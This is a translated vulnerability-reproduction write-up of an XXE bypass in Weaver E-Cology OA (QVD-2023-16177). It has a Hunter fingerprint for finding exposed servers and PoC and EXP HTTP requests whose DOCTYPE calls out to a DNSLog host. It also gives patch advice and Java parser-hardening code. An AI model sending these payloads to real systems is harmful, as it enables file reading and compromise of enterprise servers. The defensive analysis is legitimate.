Weaver (Fanwei) E-Cology XXE Vulnerability Reproduction (QVD-2023-16177)

0x01 Product Introduction

      Weaver (Fanwei) collaborative management application platform E-Cology is a large-scale enterprise collaborative management platform covering an enterprise information portal, knowledge document management, workflow management, human resource management, customer relationship management, project management, financial management, asset management, supply chain management and a data center.

0x02 Vulnerability Overview

   A function point of Weaver e-cology originally did not filter user input properly, so XXE could be triggered while that input was being processed. The fix rules that were added afterwards can still be bypassed, and this vulnerability is that bypass of the earlier fix. An attacker can exploit it to list directories, read files, and even obtain administrator privileges on the application system.

0x03 Scope of Impact

  Weaver EC 9.x with patch version < 10.58.2

  Weaver EC 8.x with patch version < 10.58.2

0x04 Reproduction Environment

Hunter (鹰图) search fingerprint: app.name="泛微 e-cology 9.0 OA"


0x05 Vulnerability Reproduction

PoC

POST /rest/ofs/ReceiveCCRequestByXml HTTP/1.1
Host: your-ip
Content-Type: application/xml

<M><syscode>&send;</syscode></M>

[screenshot: response returned by the PoC request]

 If the response shown above is returned, the endpoint is vulnerable.

 EXP 1 (replace http://dnslog.cn with your own DNSLog subdomain, otherwise the callback cannot be observed in your records)

POST /rest/ofs/ReceiveCCRequestByXml HTTP/1.1
Host: your-ip
Content-Type: application/xml

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE syscode SYSTEM "http://dnslog.cn">
<M><syscode>&send;</syscode></M>

 EXP 2

POST /rest/ofs/deleteUserRequestInfoByXml HTTP/1.1
Host: your-ip
Content-Type: application/xml

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE syscode SYSTEM "http://dnslog.cn">
<M><syscode>&send;</syscode></M>

PS: the only difference between EXP 1 and EXP 2 is the vulnerable path, /rest/ofs/ReceiveCCRequestByXml versus /rest/ofs/deleteUserRequestInfoByXml; the payload is identical.

Verification:

[screenshots: verification results]

0x06 Fix Recommendations

Interim mitigation

Restrict the source addresses that can reach the system, and do not expose it to the Internet unless necessary.

Upgrade fix

The vendor has released version 10.58.2, which fixes this vulnerability. Affected users are advised to update to 10.58.2:

https://www.weaver.com.cn/cs/securityDownload.html#
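The vendor patch is the real fix. The following Java example is added here and is not Weaver's code or code from the original post; it illustrates, at parser level, why filtering the request body (the approach the overview says was bypassed) is fragile and what a robust fix looks like. It embeds this write-up's EXP body as a constructed sample, a hypothetical blacklist filter `naiveFilterAllows` that only blocks inline `<!ENTITY` declarations (an assumption for illustration, not the vendor's actual rule), `parseUnsafe` using the JAXP defaults, and `parseSafe` using the OWASP-recommended `DocumentBuilderFactory` features. `main` deliberately never feeds the payload to `parseUnsafe`, because with default settings the JVM really would try to fetch the DOCTYPE URL, which is exactly the out-of-band signal EXP 1 and EXP 2 rely on.

```java
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;
import org.w3c.dom.Document;
import org.xml.sax.InputSource;
import org.xml.sax.SAXException;
import java.io.StringReader;

public class XxeFixDemo {

    // Constructed sample: the EXP body from this write-up, with dnslog.cn standing in
    // for the attacker's DNSLog subdomain.
    static final String EXP_BODY =
        "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n" +
        "<!DOCTYPE syscode SYSTEM \"http://dnslog.cn\">\n" +
        "<M><syscode>&send;</syscode></M>";

    // Hypothetical input filter (not the vendor's code): it only blocks inline entity
    // declarations, so a DOCTYPE that points at an external DTD passes straight through.
    static boolean naiveFilterAllows(String body) {
        return !body.toUpperCase().contains("<!ENTITY");
    }

    // Default JAXP configuration: DOCTYPEs are processed and the external DTD is fetched,
    // so parsing EXP_BODY makes the server contact the DOCTYPE URL before it even
    // notices that &send; is undeclared.
    static Document parseUnsafe(String body) throws Exception {
        DocumentBuilderFactory f = DocumentBuilderFactory.newInstance();
        return f.newDocumentBuilder().parse(new InputSource(new StringReader(body)));
    }

    // Hardened configuration (OWASP XXE prevention settings): refuse any DOCTYPE, and as
    // defence in depth also disable external entities and external DTD loading.
    static DocumentBuilder hardenedBuilder() throws ParserConfigurationException {
        DocumentBuilderFactory f = DocumentBuilderFactory.newInstance();
        f.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        f.setFeature("http://xml.org/sax/features/external-general-entities", false);
        f.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        f.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        f.setXIncludeAware(false);
        f.setExpandEntityReferences(false);
        return f.newDocumentBuilder();
    }

    static Document parseSafe(String body) throws Exception {
        return hardenedBuilder().parse(new InputSource(new StringReader(body)));
    }

    public static void main(String[] args) throws Exception {
        // The EXP payload contains no <!ENTITY ...> at all, so the blacklist lets it through.
        System.out.println("naive filter allows EXP body: " + naiveFilterAllows(EXP_BODY));

        // The hardened parser stops at the DOCTYPE itself, whatever form the entity takes.
        try {
            parseSafe(EXP_BODY);
            System.out.println("hardened parser accepted the body (unexpected)");
        } catch (SAXException e) {
            System.out.println("hardened parser rejected the body: " + e.getMessage());
        }

        // A legitimate request body without a DOCTYPE still parses normally.
        Document ok = parseSafe("<M><syscode>abc</syscode></M>");
        System.out.println("hardened parser read syscode = "
            + ok.getElementsByTagName("syscode").item(0).getTextContent());

        // parseUnsafe(EXP_BODY) is intentionally not called here: outside a lab it would
        // trigger the DNS/HTTP callback to the DOCTYPE URL.
    }
}
```

Compile and run with `javac XxeFixDemo.java && java XxeFixDemo`. The setting that matters is `disallow-doctype-decl`: once the parser refuses every DOCTYPE, neither an inline entity declaration nor the external-DTD form used by EXP 1 and EXP 2 reaches the entity resolver, and no string blacklist on the request body is needed. If an application genuinely needs DTDs, the remaining three features still have to be turned off, and the same hardening must be applied to every XML entry point (here both /rest/ofs/ReceiveCCRequestByXml and /rest/ofs/deleteUserRequestInfoByXml), not just the one first reported.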


Source: blog.csdn.net/qq_41904294/article/details/131878446